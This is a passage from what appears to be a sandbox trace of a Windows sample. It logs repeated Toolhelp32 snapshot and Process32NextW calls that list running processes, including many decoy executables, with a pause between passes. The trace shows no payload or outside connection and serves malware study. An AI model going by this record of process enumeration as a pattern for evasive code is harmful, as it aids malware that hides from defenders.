lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.414] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.416] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.417] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.418] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.419] CloseHandle (hObject=0xc4) returned 1 [0150.419] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.423] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.424] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.433] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.434] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.435] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.436] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.437] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.438] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.439] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.440] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.443] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.447] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0150.449] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0150.450] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0150.452] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.453] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0150.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0150.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0150.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0150.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0150.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0150.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0150.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0150.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0150.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0150.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0150.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0150.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0150.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0150.469] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0150.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0150.508] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0150.509] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0150.510] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0150.511] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0150.512] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0150.513] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.514] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0150.515] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0150.516] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0150.517] CloseHandle (hObject=0xbc) returned 1 [0150.517] Sleep (dwMilliseconds=0x12c) [0150.889] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.895] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0150.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0150.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0150.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0150.900] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0150.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0150.902] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0150.903] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0150.904] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.905] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.906] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.907] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.908] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0150.909] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.910] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.911] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0150.912] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0150.914] 